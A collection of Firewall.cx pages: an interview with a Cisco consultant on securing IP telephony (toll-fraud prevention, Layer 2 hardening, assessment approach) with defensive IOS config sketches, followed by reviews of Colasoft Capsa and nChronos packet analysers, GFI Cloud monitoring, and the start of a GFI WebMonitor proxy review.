Akhil Behl is a Senior Network Consultant with Cisco Advanced Services, focusing on Cisco Collaboration and Security architectures. He leads Collaboration and Security projects worldwide for Cisco Services and the Collaborative Professional Services (CPS) portfolio for the commercial segment. Prior to his current role, he spent 10 years working in various roles at Linksys, Cisco TAC, and Cisco AS. He holds CCIE (Voice and Security), PMP, ITIL, VMware VCP, and MCP certifications.

He has several research papers published to his credit in international journals including IEEE Xplore.

He is a prolific speaker and has contributed at prominent industry forums such as Interop, Enterprise Connect, Cloud Connect, Cloud Summit, Cisco SecCon, IT Expo, and Cisco Networkers.

Be sure not to miss our review of Akhil's popular Securing Cisco IP Telephony Networks and his outstanding article on Secure CallManager Express Communications - Encrypted VoIP Sessions with SRTP and TLS.

Readers can find outstanding Voice Related Technical Articles in our Cisco VoIP/CCME & CallManager Section.

Interview Questions

Q1. What are the benefits of a pure VoIP against a hybrid system?

Pure VoIP solutions are a recent addition to the overall VoIP portfolio. SIP trunks offered by service providers are helping make the PSTN world reachable over IP instead of TDM. A pure VoIP system has a number of advantages over a hybrid VoIP system, for example (a small SIP trunk dial-peer sketch follows the list below):

  • All media and signaling is purely IP based and no digital or TDM circuits come into picture. This in turn implies better interoperability of various components within and outside the ecosystem.
  • Configuration, troubleshooting, and monitoring of a pure VoIP solution is much more lucid as compared to a hybrid system.
  • The security construct of a pure VoIP system is something which the provider and consumer can mutually agree upon and deploy. In other words, the enterprise security policies can now go beyond the usual frontiers up to the provider’s soft-switch/SBC.
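
To make the SIP trunk point a little more concrete, here is a minimal, hypothetical Cisco IOS sketch of an outbound VoIP dial-peer towards a provider's SIP trunk. The dial-peer tag, the 9T access-code pattern and the provider address 203.0.113.10 are illustrative assumptions, not values taken from the interview:

! Hypothetical outbound dial-peer towards an ITSP SIP trunk
! (tags, patterns and addresses below are example values only)
dial-peer voice 200 voip
 description Outbound calls to ITSP SIP trunk
 destination-pattern 9T
 session protocol sipv2
 session target ipv4:203.0.113.10
 dtmf-relay rtp-nte
 codec g711ulaw
 no vad

With signalling and media carried end to end over IP, there is no TDM leg left to configure, which is essentially the interoperability and manageability point made above.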

Q2. What are the key benefits/advantages and disadvantages of using Cisco VoIP Telephony System, coupled with its security features?

Cisco’s IP Telephony / Unified Communications systems present a world-class VoIP solution to customers ranging from SMBs to small, medium and large enterprises, as well as various business verticals such as education, finance, banking, the energy sector, and government agencies. When the discussion is around the security aspect of a Cisco IP Telephony / UC solution, the advantages outweigh the disadvantages because of a multitude of factors:

  • Cisco IP Telephony endpoints and the underlying network gear are capable of providing robust security by means of built-in security features
  • Cisco IP Telephony portfolio leverages industry standard cryptography and is compatible with any product based on RFC standards
  • Cisco engineering leaves no stone unturned to ensure that the IP Telephony products and applications deliver feature rich consumer experience; while maintaining a formidable security posture
  • Cisco Advanced Services helps consumers design, deploy, operate, and maintain a secure, stable, and robust Cisco IP Telephony network
  • Cisco IP Telephony and network applications / devices / servers can be configured on-demand to enable security to restrain a range of threats

Q3. As an author, please comment on the statement that your book can be used both as a reference and as a guide for security of Cisco IP Telephony implementation.

Over the past 10 years, I have seen people struggling with the lack of a complete text which can act as a reference, a guide, and a companion to help resolve UC security queries pertinent to the design, deployment, operation, and maintenance of a Cisco UC network. I felt there was a lack of complete literature which could help one through the various stages of Cisco UC solution development and build, i.e. Plan, Prepare, Design, Implement, Operate, and Optimize (PPDIOO), and thought of putting together all my experience and knowledge in the form of a book where the two realms, Unified Communications and Security, converge. More often than not, people from one realm are not acquainted with the intricacies of the other. This book serves to fill in the otherwise prominent void between the UC and Security realms and acts as a guide and a reference text for professionals, engineers, managers, stakeholders, and executives.

Q4. What are today’s biggest security threats when dealing with Cisco Unified Communication installations?

While there are a host of threats out there which lurk around your Cisco UC solution, the most prominent ones are as follows:

  • Toll-Fraud
  • Eavesdropping
  • Session/Call hijacking
  • Impersonation or identity-theft
  • DOS and DDOS attacks
  • Poor or absent security guidelines or policy
  • Lack of training or education at user level on their responsibility towards corporate assets such as UC services

As you can see, not every threat is a technical threat; there are also threats pertinent to human and organizational factors. More often than not, the focus is only on technical threats, while organizations and decision makers should pay attention to the other (non-technical) factors as well, without which a well-rounded security construct is difficult to achieve.

Q5. When implementing SIP Trunks on CUCM/CUBE or CUCME, what steps should be taken to ensure Toll-Fraud is prevented?

An interesting question, since toll-fraud is a chronic issue. With the advent of SIP trunks for PSTN access, the threat surface has evolved and a host of new threats comes into the picture. While most of these threats can be mitigated at the call-control and Session Border Controller (CUBE) level, an improper configuration of call restriction and privilege, as well as a poorly implemented security construct, can eventually lead to toll-fraud. To prevent toll-fraud on SIP trunks, the following suggestions can be helpful (a small CUCME configuration sketch follows the list below):

  • Ensure that users are assigned the right calling search space (CSS) and partitions (in case of CUCM) or Class of Restriction (COR in case of CUCME)  at line/device level to have a granular control of who can dial what
  • Implement after-hour restrictions on CUCM and CUCME
  • Disable PSTN or out-dial from Cisco Unity, Unity Connection, and CUE or at least restrict it to a desirable local/national destination(s) as per organization’s policies
  • Implement strong pin/password policies to ensure user accounts cannot be compromised by brute force or dictionary based attacks
  • For softphones such as Cisco IP Communicator try and use extension mobility which gives an additional layer of security by enabling user to dial international numbers only when logged in to the right profile with right credentials
  • Disable PSTN-to-PSTN tromboning of calls if it is not required, or restrict it as per organizational policies
  • Where possible enable secure SIP trunks and SIP authorization for trunk registration with provider
  • Implement COR where possible at SRST gateways to discourage toll-fraud during an SRST event
  • Monitor usage of the enterprise UC solution by call billing and reporting software (e.g. CAR) on an ongoing basis to detect any specific patterns or any abnormal usage
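
As a small illustration of the after-hours and exemption suggestions above, here is a minimal, hypothetical Cisco Unified CME sketch. The block patterns, days, times and ephone tag are example values only and would need to be adapted to, and validated against, the organisation's own dial plan and security policy:

! Hypothetical CUCME after-hours call blocking
! (patterns, days, times and ephone tags are example values only)
telephony-service
 after-hours block pattern 1 9011 7-24
 after-hours block pattern 2 91900 7-24
 after-hours day Sat 00:00 23:59
 after-hours day Sun 00:00 23:59
!
! Users who legitimately need out-of-hours dialling can be exempted per phone
ephone 10
 after-hour exempt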

Q6. A common implementation of Cisco IP Telephony is to install the VoIP Telephony network on a separate VLAN – the Voice VLAN, which has restricted access through access lists applied on a central layer-3 switch. Is this common practice adequate to provide basic-level of security?

Well, I wouldn’t just filter the traffic at Layer 3 with access-lists or just do VLAN segregation at Layer 2, but would also enable security features such as:

  • Port security
  • DHCP snooping
  • Dynamic ARP Inspection (DAI)
  • 802.1x
  • Trusted Relay Point (TRP)
  • Firewall zoning

and so on, throughout the network, to ensure that legitimate endpoints in the voice VLAN (whether hard phones or softphones) can get access to the enterprise network and resources. While most of the aforementioned features can be enabled without any additional cost, it’s important to understand the impact of enabling these features in a production network, as well as to ensure that they are in line with the corporate/IP Telephony security policy of the enterprise.
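
To give a flavour of how a few of these Layer 2 protections look on a Catalyst access switch, here is a minimal, hypothetical IOS sketch. The VLAN numbers (data VLAN 10, voice VLAN 150), interface names and port-security maximum are illustrative assumptions and, as Akhil notes, the impact of each feature should be assessed against the production network and the enterprise security policy before deployment:

! Hypothetical access-layer hardening sketch (example VLANs and ports only)
ip dhcp snooping
ip dhcp snooping vlan 10,150
ip arp inspection vlan 10,150
!
interface GigabitEthernet0/1
 description Access port - PC plus IP phone
 switchport mode access
 switchport access vlan 10
 switchport voice vlan 150
 switchport port-security
 switchport port-security maximum 3
 spanning-tree portfast
!
interface GigabitEthernet0/24
 description Uplink towards distribution and DHCP server
 ip dhcp snooping trust
 ip arp inspection trust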

Q7. If you were asked to examine a customer’s VoIP network for security issues, what would be the order in which you would perform your security checks? Assume Cisco Unified Communications Manager Express with IP Telephones (wired & wireless), running on Cisco Catalyst switches with multiple VLANs (data, voice, guest network etc) and Cisco Aironet access points with a WLC controller. Firewall and routers exist, with remote VPN teleworkers

My first step towards assessing the security of the customer’s voice network will be to ask them about any recent or noted security incidents, as this will help me understand where and how an incident could have happened and what key security breaches or threats I should be looking at, apart from the overall assessment.

I would then look at the customer’s security policy, which can be a corporate security policy or an IP Telephony-specific security policy, to understand how they position the security of enterprise/SMB communications in line with their business processes. This is extremely important because, without proper information on what their business processes are and how security aligns with them, I cannot advise them to implement the right security controls at the right places in the network. This also ensures that the customer’s business as usual is not interrupted when security is applied to the call control, endpoints, switching infrastructure, wireless infrastructure, routing infrastructure, the firewall, and for telecommuters.

Once I have enough information about the customer’s network and security policy, I will start by inspecting the configuration of the access switches, moving on to the distribution and core layers and then data center access. I will look at the WLC and WAP configurations next, followed by the IOS router and firewall configurations.

Once done at the network level, I will continue the data collection and analysis at the CUCME end. This will be followed by an analysis of the endpoints (wired and wireless) as well as the softphones used by telecommuters.

At this point, I should have enough information to conduct a security assessment and provide a report/feedback to the customer and engage with the customer in a discussion about the opportunities for improvement in their security posture and construct to defend against the threats and security risks pertinent to their line of business.

Q8. At Firewall.cx, we are eagerly looking forward to our liaison with you, as a CCIE and as an expert on Cisco IP Telephony. To all our readers and members, what would be your message for all those who want to trace your footsteps towards a career in Cisco IP Telephony?

I started in the IT industry almost a decade ago with Linksys support (a division of Cisco Systems). Then I worked with Cisco TAC for a couple of years in the security and AVVID teams, which gave me a real view and feel of things from both the security and telephony domains. After Cisco TAC I joined the Cisco Advanced Services (AS) team, where I was responsible for Cisco’s UC and security portfolio for customer-facing projects, and from there went on to manage a team of consultants. Along the way I did CCNA, CCVP, CCSP, CCDP, and many other Cisco specialist certifications to enhance my knowledge, and worked towards my first CCIE, which was in Voice, and my second, which was in Security. I am a co-lead of the Cisco AS UC Security Tiger Team and have been working on a ton of UC Security projects, consulting assignments, workshops, knowledge transfer sessions, and so on.

It was almost two years ago that I decided to write a book on the very subject of my interest, that is, UC/IP Telephony security. As I mentioned earlier in this interview, I felt there was a dire need for a title which could bridge the otherwise prominent gap between the UC and Security domains.

My advice to anyone who wishes to make a career in the Cisco IP Telephony domain is: ensure your basics are strong, as products may change and morph form; however, the basics will always remain the same. Always be honest with yourself and do what it takes to ensure that you complete your work/assignment – keeping in mind the balance between your professional and personal life. Lastly, do self-training or get training from Cisco/Partners on new products or services to ensure you are keeping up with the trends and changes in Cisco’s collaboration portfolio.


Software Review: Colasoft Capsa 7 Enterprise Network Analyzer

Reviewer: Arani Mukherjee

Colasoft Capsa 7.2.1 Network Analyser was reviewed by Firewall.cx a bit more than a year ago. Within a year, Colasoft has managed to bring out the latest version of the Analyser software, version 7.6.1.

As a packet analyser, Colasoft Capsa Enterprise has already collected many accolades from users and businesses, so I will refrain from turning this latest review into a comparison between the two versions. Since Colasoft has made the effort to give us a new version of a well-established product, it’s only fair that I perform the review in light of the latest software. This only goes to prove that the new software is not just an upgraded version of the old one, but a heavyweight analyser in its own right.

capsa enterprise v7.1 review

As an effective packet analyser, the various functions it performs are: detecting network issues, intrusion and misuse; isolating network problems; monitoring bandwidth usage, data in motion and endpoint security; and serving as a day-to-day primary data source for network monitoring and management. Capsa is one of the most well-known packet analysers available today, and the reasons it occupies such an enviable position in the networking world are its simplicity in deployment, usage, and data representation. Let’s now put Capsa under the magnifying glass to get a better understanding of why it’s one of the best you can get.

colasoft Capsa enterprise traffic chart

Installing Colasoft Capsa Enterprise

I have mentioned before that I will not use this as an opportunity for comparison between the two versions. However, I must admit, Capsa has retained all the merits displayed in the older version. This is a welcome change, as I have often witnessed newer versions of software suddenly abandoning certain features just after all the users have got used to them. So, in light of that, the first thing worth noting is the ease of installation of the software. It was painless, from the moment you download the full version or the demo copy till you put in the license key information and activate it online. There are other ways of activating it, but as a network manager, why would someone install a packet analyser on a machine which does not have any network connection?

It takes 5-7 minutes to get the software up and running to a point where you can start collecting data about your network. It carries all the hallmarks of a seamless, easy installation and deployment and, for all of us, one less thing to worry about. Bearing in mind that some of you might find an ad hoc review of this software already done while Colasoft’s nChronos Server was being reviewed, I will try not to repeat myself.

Using Capsa Enterprise

You will be greeted with an uncluttered, well-designed front screen, as displayed below.

The default view is the first tab, called Dashboard. Once you have selected which adapter you want to monitor (and you can have several sessions based on what you do), you hit the ‘Start’ button to start collecting data. The Dashboard then starts filling up with data as it is gathered. The next screenshot shows what your dashboard will end up looking like:

packet sniffing main console traffic analyzer

Every tab on this software will display data based on what you want to see. In the Node Explorer on the left you can select either a full analysis or particular analysis based on either protocol, the physical nodes or IP nodes.

The Total Traffic Graph is a live progressing chart which can update its display as fast as every 1 second, or as slowly as every hour. If you don’t fancy the progressing line graph, you can ponder the bar chart at the bottom. For your benefit, you can pause the live flow of the graph by right-clicking and selecting ‘Pause Refresh’, as shown below:

capsa enterprise main interface

The toolbar at the top needs particular mention because of the features it provides. My favourites were obviously the Utilisation and PPS meters. I forced a download from an FTP site and captured how the needles reacted. Also note the traffic chart, which captured bytes per second. The needle position updated every second:

colasoft capsa traffic

The Summary tab is there to provide the user with a full statistical analysis of the network traffic. The separate sections are self-explanatory and do provide in-depth metadata.

The Diagnosis tab is of particular interest. It gives a full range view of what’s happening to the data in the network in terms of issues encountered:

capsa enterprise protocol diagnosis

The diagnosis is separated in terms of the actual layers, severity and event description. This I found to be very useful when defining the health of my network.

The Protocol tab gave me a ringside view of the protocols that were topping the list and what was responsible for what chunk of data flowing through the network. I deemed it useful when I wanted to find out who’s been downloading too much using FTP, or who has set up a simultaneous ping test of a node.

Physical and IP Endpoints tabs showed data conversations happening between the various nodes in my network. I actually used this feature to isolate two nodes which were responsible for a sizeable chunk of the network traffic within a LAN. A feature I’m sure network managers will find useful.

The Physical, IP, TCP, and UDP Conversations tabs are purely an expanded form of the information provided at the bottom of the previous two tabs.

My favourite tab was the Matrix, not just because of the name but because of what it displayed. Every data transfer and its corresponding links were mapped based on IP nodes and physical nodes. You also have the luxury of only seeing the top 100 in the above categories. Here’s a screenshot of my network in full bloom, the top 100 physical conversations:

colasoft capsa matrix analysis

The best display for me was when I selected Top 100 IPv4 Conversations and hovered the mouse over one particular conversation. Not only did Capsa tell me how many peers it was conversing with, it also showed me how many packets were received and sent:

review-capsa-enterprisev7-7

Further on, the Packet tab is quite self-explanatory. It shows every packet spliced up into its various protocol and encapsulation-based components. This is one bit that definitely makes me feel like a crime scene investigator, a feeling I also had while reviewing nChronos. It also helps in terms of understanding how a packet is built and transferred across a network. Here’s a screenshot of one such packet:

capsa enterprise packet view

As shown above, the level of detail is exhaustive. I wish I’d had this tool when I was learning about packets and their structure. This would have made my learning experience a bit more pleasurable.

All of this is just under the Analysis section. Under the Tools section, you will find very useful applications like the Ping and the MAC Scanner. For me, the MAC Scanner was very useful as I could take a snapshot of all MAC addresses and then be able to compare any changes at a later date. This is useful if there is a change in any address and you are not aware of it. It could be anything from a network card change to a new node being added without you knowing.

I was pleasantly surprised by the level of flexibility of this software when it came to how you wish to see the data. There is the option to have your own charts, add filters against protocols to ignore data that is not important, and create alarm conditions which will notify you if a threshold is met or exceeded. A key feature for me was being able to store packet data and then replay it later using the Packet Player, another nice tool in the Tools section. This historical lookup facility is essential for any comparison that needs to be performed after a network issue has been dealt with.

Summary

I have worked with several packet and network analysers and I have to admit Capsa Enterprise captures data and displays it in the best way I have seen. My previous experiences were marred by features that were absent and features that didn’t work or deliver the expected outcome. Colasoft has done a brilliant job of delivering Capsa, which meets all my expectations. This software is not only helpful for network managers but also for students of computer networking. I definitely would have benefitted from Capsa had I known about it back then, but I know about it now. This tool puts network managers more in control of their networks and gives them that much-needed edge for data interpretation. I would tag it with a ‘Highly Recommended’ logo.

 


Cloud-based Network Monitoring: The New Paradigm - GFI Free eBook

GFI has once again managed to make a difference: they recently published a free eBook named "Cloud-based network monitoring: The new paradigm" as part of their GFI Cloud offerings.

IT managers face numerous challenges when deploying and managing  applications across their network infrastructure. Cloud computing and cloud-based services are the way forward.

This 28-page eBook covers a number of important key topics, which include:

  • Traditional Network Management
  • Cloud-based Network Monitoring: The new Paradigm
  • Big Challenges for Small Businesses
  • A Stronger Defense
  • How to Plan Ahead
  • Overcoming SMB Pain Points
  • The Best Tools for SMBs
  • ...and much more!

This eBook is no longer offered by the vendor. Please visit our Security Article section to gain access to similar articles.


GFI Network Server Monitor Online Review - Road Test

Reviewer: Alan Drury

There’s a lot of talk about ‘the cloud’ these days, so we were intrigued when we were asked to review GFI’s new Cloud offering. Cloud-based solutions have the potential to revolutionise the way we work and make our lives easier, but can reality live up to the hype? Is the future as cloudy as the pundits say? Read on and find out.

What is GFI Cloud?

GFI Cloud is a new service from GFI that provides anti-virus (VIPRE) and workstation/server condition monitoring (Network Server Monitor Online) via the internet. Basically you sign up for GFI Cloud, buy licenses for the services you want and then deploy them to your internet-connected machines no matter where they are. Once that’s done, as long as you have a PC with a web browser you can monitor and control them from anywhere.

In this review we looked at GFI Network Server Monitor Online, but obviously to do that we had to sign up for GFI Cloud first.

Installation of GFI Network Server Monitor Online

Installation is quick and easy; so easy in fact that there’s no good reason for not giving this product a try. The whole installation, from signing up for our free 30-day trial to monitoring our first PC, took barely ten minutes.

To get started, simply follow the link from the GFI Cloud product page and fill in your details:

gfi-network-server-monitor-cloud-1

Next choose the service you’re interested in. We chose Network Server Monitor Online:

gfi-network-server-monitor-cloud-2

Then, after accepting the license agreement, you download and run the installer and that’s pretty much it:

gfi-network-server-monitor-cloud-3

Your selected GFI Cloud products are then automatically monitoring your first machine – how cool is that?

Below is a screenshot of the GFI Cloud desktop. The buttons down the left-hand side and the menu bar across the top let you view the output from either Server Monitor or VIPRE antivirus or, as shown here, you can have a status overview of your whole estate.

gfi-network-server-monitor-cloud-4

We’ve only got one machine set up here but we did add more, and a really useful touch is that machines with problems always float to the top so you need never be afraid of missing something. There’s a handy Filters box through which you can narrow down your view if required. You can add more machines and vary the services running on them, but we’ll come to that later. First let’s have a closer look at Network Server Monitor Online.

How Does It Work?

Network Server Monitor Online uses the GFI Cloud agent installed on each machine to run a series of health checks and report the results. The checks are automatically selected based on the type of machine and its OS. Here’s just a sample of those it applied to our tired XP laptop:

As well as the basics like free space on each of the volumes there’s a set of comprehensive checks to make sure the essential Windows services are running, checks for nasties being reported in the event logs and even a watch on the SMART status of the hard disk.

If these aren’t enough you can add your own similar checks and, usefully, a backup check:

gfi-network-server-monitor-cloud-6

This really is nice – the product supports lots of mainstream backup suites and will integrate with the software to check for successful completion of whatever backup regime you’ve set up. If you’re monitoring a server then that onerous daily backup check is instantly a thing of the past.

As well as reporting into the GFI Cloud desktop each check can email you or, if you add your number to your cloud profile, send you an SMS text alert. So now you can relax on your sun lounger and sip your beer safe in the knowledge that if your phone’s quiet then all is well back at the office.

Adding More Machines To GFI Network Server Monitor Online

gfi-network-server-monitor-cloud-7

Adding more machines is a two-step process. First you need to download the agent installer and run it on the machine in question. There’s no need to log in - it knows who you are, so you can do a silent push installation and everything will be fine. GFI Cloud can also create a group policy installer for installation on multiple workstations and servers. On our XP machine the agent only took 11k of RAM and there was no noticeable performance impact on any of the machines we tested.

Once the agent’s running the second step is to select the cloud service(s) you want to apply:

gfi-network-server-monitor-cloud-8

When you sign up for GFI cloud you purchase a pool of licenses and applying one to a machine is as simple as ticking a box and almost as quick – our chosen product was up and running on the target machine in less than a minute.

This approach gives you amazing flexibility. You can add services to and remove them from your machines whenever you like, making sure that every one of your purchased licenses is working for you. It’s also scalable – you choose how many licenses to buy so you can start small and add more as you grow. Taking the license off a machine doesn’t remove it from GFI Cloud (it just stops the service) so you can easily put it back again, and if a machine is ever lost or scrapped you can retrieve its licenses and use them somewhere else. Quite simply, you’re in control.

Other Features

Officially this review is about Network Server Monitor Online, but by adding a machine into GFI Cloud you also get a comprehensive hardware and software audit. This is quite useful in itself but when coupled with Network Server Monitor Online it tells you almost everything you need to know:

gfi-network-server-monitor-cloud-9

On top of this you can reboot machines remotely and see at a glance which machines have been shut down or, more ominously, are supposed to be up but aren’t talking to the cloud.

The whole thing is very easy to use but should you need it the documentation is excellent and you can even download a free e-book to help you on your way.

In Conclusion

What GFI has done here is simply brilliant. For a price that even the smallest organisation can afford you get the kind of monitoring, auditing and alerting that you know you need but think you don’t have the budget for. Because it’s cloud-based it’s also a godsend for those with numerous locations or lots of home-workers and road warriors. The low up-front cost and the flexible, scalable, pay-as-you-go licensing should please even the most hard-bitten financial director. And because it’s so easy to use it can sit there working for you in the background while you get on with other things.

Could it be improved? Yes, but even as it stands this is a solid product that brings reliable and useful monitoring, auditing and alerting within the reach of those who can’t justify the expense of dedicated servers and costly software. GFI is on a winner here, and for that reason we’re giving GFI Cloud and GFI Network Server Monitor Online the coveted Firewall.cx ten-out-of-ten award.


Colasoft: nChronos v3 Server and Console Review

Reviewer: Arani Mukherjee

nChronos, a product of Colasoft, is one of the cutting-edge packet/network analysers that the market has to offer today. What we have been promised by Colasoft through their creation is end-to-end, round-the-clock packet analysis, coupled with historical network analysis. nChronos provides an enterprise network management platform which enables users to troubleshoot, diagnose and address network security and performance issues. It also allows retrospective network analysis and, as stated by Colasoft, will “provide forensic analysis and mitigate security risks”. Predictably, it is a must-have for anyone involved with network management and security.

Packet analysis has been at the forefront for a while, serving purposes such as network analysis; detection of network intrusion and misuse; isolation of exploited systems; monitoring of network usage, bandwidth usage and endpoint security status; verification of adds, moves and changes; and various other such needs. There are quite a few players in this field and, for me, it does boil down to some key unique selling points. I will lay out the assessment using criteria like ease of installation, ease of use and unique selling points and, based on all of the aforementioned, how it stacks up against the competition.

Ease of Installation - nChronos Installation

The installation instructions for both the nChronos Server and Console are straightforward. You install the server first, followed by the console. Setting up the server was easy enough. The only snag I encountered was when I tried to log onto the server for the first time. The shortcut created by default opens the web interface using the default web browser. However, it uses ‘localhost’ as the primary link for the server, which brings up the default web page of the physical server on which the nChronos server was installed. I was a bit confused when the home page of my web server came up instead of what I was expecting, but one look into the online help files showed a reference on this topic that said to try ‘localhost:81’ and, if that doesn’t work, ‘localhost:82’. The first option worked straight away, so I promptly changed the nChronos server shortcut to point to ‘localhost:81’. Voilà, all was good. The rest of the configuration was extremely smooth, and the run of events followed exactly what was said in the instruction manual. For some reason, at the end of the process the nChronos server is meant to restart; if by any chance you receive an error message along the lines of the server not being able to restart, it’s possibly a glitch, as the server restarted just fine in my case. I went ahead and tried the various installation scenarios mentioned, and all of them worked just as well.

Once the server was up and running, I proceeded to install the nChronos Console, which was also straightforward; it worked first time, every time. With minimal effort I was able to link the console to the server and start checking out its features. And yes, don’t forget to turn monitoring on for the network interfaces you need to manage; you can do that either from the server or from the console itself. So, all in all, the installation process passed with high grades.

Ease Of Use

Just before starting to use the software I was getting a bit apprehensive about what I needed to include in this section. First I thought I would go through the explanation of how the software works and elaborate on the technologies used to render the functionalities provided. But then it occurred to me that it would be redundant for me to expand on all of that because this is specialist software. The users of this type of software are already aware of what happens in the background and are well versed with the technicalities of the features. I decided to concentrate on how effectively this software helps me perform the role of network management, packet tracing and attending to issues related to network security.

The layout of the nChronos Server is very simple and I totally agree with Colasoft’s approach of a no-nonsense interface. You could have bells and whistles added, but they would only enhance the cosmetic aspect of the software, adding little or nothing to its function.

colasoft nchronos server administration

The screenshot above gives you an idea of what the Server Administration page looks like; it is the first page that opens once the user has logged in. This is the System Information page. On the left pane you will find several other pages to look at, namely Basic Settings (which displays default port info and HDD info of the host machine), User Account (the name says it all), and Audit Log (which shows the audit trail of user activity).

The interesting page to look at is Network Link. This is where the actual interfaces to be monitored are added. The screenshot below shows this page:

colasoft nchronos network link

Obviously, for the purpose of this review, the only NIC registered on the server was the NIC of my own machine. This is the page from which you can start monitoring the various network interfaces across your network. Packet data for a NIC will not be captured until you have clicked the ‘Start’ button for that specific NIC. So don’t go blaming the car for not starting when you haven’t even turned the ignition key!

All in all, it’s simple and effective, and it leaves you fewer chances of making errors.

Now that the server is all up and running we use the nChronos Console to peer into the data that it is capturing:

colasoft nchronos network console

The above screenshot shows the console interface. For the sake of simplicity I have labelled three separate zones: 1, 2 and 3. When the user logs in for the first time, he/she has to select the interface that needs to be looked at from zone 2 and click on the ‘Open’ button. That then shows all the details about that interface in zones 1 and 3. Notice in zone 1 there is a strip of buttons, one of which is the auto-scroll feature. I loved this feature as it helps you see the traffic as it passes through. To see a more detailed data analysis you simply click, drag and release the mouse button to select a time frame. This unleashes a spectrum of relevant information in zone 3. Each tab displays the packets captured through a category window; the Application tab, for example, shows the types of application protocols used in that time frame, i.e. HTTP, POP, etc.

One of the best features I found was the ability to parse each line of data under any tab by double-clicking on it. So if I double-clicked the line on the Application tab that says HTTP, it would drill down to IP Address. I could keep on drilling down and it would traverse from HTTP to IP Address, to IP Conversation, to TCP Conversation. I could also jump to any specific drill-down state by right-clicking on the application protocol itself and making a choice from the right-click menu. This is a very useful feature. For the more curious, the little spikes in traffic in zone 1 were my mail application checking for new mail every 5 seconds.

The magic happens when you right click on any line of data and select ‘Analyse Packet’. This invokes the nChronos Analyzer:

colasoft nchronos packet analyzer

The above screenshot shows what the Analyzer looks like by default. This was by far my favourite tool. The way the information about the packets is presented is just beyond belief. This is one example where Colasoft has shown one of its many strengths: it can combine flamboyance with function. The list of tabs along the top gives you an idea of how many ways the Analyzer can show you the data you want to see. Some of my favourites follow, starting with the Protocol tab:

colasoft nchronos analysis

This is a screenshot of the Protocol tab. I was impressed by the number of column headers used to show detailed information about the packets. The tree-like, expanded way of showing protocols under particular data units, based on the layers involved, was useful.

Another one of my favourite tabs was the Matrix:

colasoft nchronos network matrix

The utility of this tab is to show the top 100 end-to-end conversations, which can be IP conversations, physical conversations etc. If you double-click any of the lines denoting a conversation, it opens up the actual data exchange between the nodes. This is very important for a network manager who needs to decipher exactly what communication was taking place between two nodes, be it physical or IP, at a given point in time. It can be helpful in terms of checking network abuse, intrusions etc.

This brings me to my most favourite tab of all, the Packet tab. It shows the end-to-end data being exchanged between any two interfaces and exactly what that data was. I know this is the primary function of most packet analyzers, but I like Colasoft’s treatment of it:

colasoft nchronos packet analysis

I took the liberty of breaking the screen into three zones to show how easy it is to delve into any packet. In zone 1, you select exactly which interchange of data between the nodes concerned you want to splice. Once you have done that, zone 2 shows the packet structure in terms of the different network layers, i.e. Data Link Layer, Network Layer, Transport Layer, Application Layer etc. Zone 3 then shows you the actual data that was encapsulated inside that specific packet. This is by far the most lucid and practical approach I have seen from any packet analyzer software when showing encapsulated data within packets. I kid you not, I have seen many packet analyzers and Colasoft trumps the lot.
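To make the layered view in zone 2 a little more concrete, here is a rough sketch of the kind of decapsulation any packet analyser performs on a raw frame. It is a simplified Ethernet/IPv4/TCP parse using Python’s struct module, written purely as an illustration of the concept – it is not Colasoft’s decoder, and it ignores VLAN tags, IP options and anything that isn’t TCP.

# Simplified sketch of layered decoding (Ethernet -> IPv4 -> TCP), the way a
# packet analyser might do it. Real analysers handle far more protocols and edge cases.
import struct

def decode_frame(frame: bytes) -> dict:
    # Data Link layer: 6-byte destination MAC, 6-byte source MAC, 2-byte EtherType.
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    layers = {"eth": {"dst": dst.hex(":"), "src": src.hex(":"), "type": hex(ethertype)}}
    if ethertype != 0x0800:          # not IPv4 -> stop here in this sketch
        return layers

    # Network layer: IPv4 header (assuming no options, i.e. 20 bytes).
    ip = frame[14:34]
    proto = ip[9]
    src_ip = ".".join(str(b) for b in ip[12:16])
    dst_ip = ".".join(str(b) for b in ip[16:20])
    layers["ipv4"] = {"proto": proto, "src": src_ip, "dst": dst_ip}
    if proto != 6:                   # not TCP -> stop here in this sketch
        return layers

    # Transport layer: TCP source and destination ports.
    sport, dport = struct.unpack("!HH", frame[34:38])
    layers["tcp"] = {"sport": sport, "dport": dport}

    # Anything beyond the Ethernet/IP/TCP headers (assuming a 20-byte TCP header)
    # is the application-layer payload shown in zone 3.
    layers["payload_bytes"] = max(0, len(frame) - 54)
    return layers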

Summary

Colasoft’s unique selling points will always remain simplicity, careful positioning of features to facilitate easy access for users, presentation of data in a non-messy way for maximum usability and, especially for me, making me feel like a Crime Scene Investigator of networks, like you might see on CSI: Las Vegas (apologies to anyone who hasn’t seen the CSI series).

Network security has become of paramount importance in our daily lives as more and more civil, military and scientific work and facilities become dependent on networks. For a network administrator it is important not only to restore normal network operations as soon as possible, but also to go back and investigate successfully why an event capable of crippling a network might have happened in the first place. This is equally applicable to preventing such a disruptive event.

Colasoft’s nChronos Server and Console, coupled with the Analyzer, is a well-assorted bundle of efficient software which performs all the functions required to preserve network integrity and security. It is easy to set up and maintain, requires minimal intervention once it is working, and delivers vast amounts of important information in the easiest manner possible. This software bundle is a must-have for any organisation which, for all the right reasons, values its network infrastructure highly and wants to preserve its integrity and security.


GFI WebMonitor 2012 Internet Web Proxy Review

Review by Alan Drury and John Watters

review-badge-98

The Internet connection is vital for many small to medium or large-sized enterprises, but it can also be one of the biggest headaches. How can you know who is doing what? How can you enforce a usage policy? And how can you protect your organisation against internet-borne threats? Larger companies tend to have sophisticated firewalls and border protection devices, but how do you protect yourself when your budget won’t run to such hardware? This is precisely the niche GFI has addressed with GFI WebMonitor.

How Does GFI WebMonitor 2012 Work?

Before we get into the review proper it’s worth taking a few moments to understand how it works. GFI WebMonitor installs onto one of your servers and sets itself up there as an internet proxy. You then point all your browsers to the internet via that proxy and voilà – instant monitoring and control.

The server you choose doesn’t have to be internet-facing or even dual-homed (although it can be), but it does obviously need to be big enough and stable enough to become the choke point for all your internet access. Other than that, as long as it can run the product on one of the supported Microsoft Windows Server versions, you’re good to go.
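To illustrate what ‘pointing your browsers at the proxy’ boils down to, the snippet below routes a request through an explicit HTTP proxy using Python’s requests library. The host name and port are hypothetical placeholders rather than WebMonitor defaults, so substitute the address and port of the server you installed it on.

# Minimal sketch of sending web traffic via an explicit HTTP proxy.
# "webmonitor-server" and port 8080 are placeholders - use your own proxy address and port.
import requests

PROXIES = {
    "http": "http://webmonitor-server:8080",
    "https": "http://webmonitor-server:8080",
}

response = requests.get("http://www.firewall.cx/", proxies=PROXIES, timeout=10)
print(response.status_code, len(response.content), "bytes fetched via the proxy")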

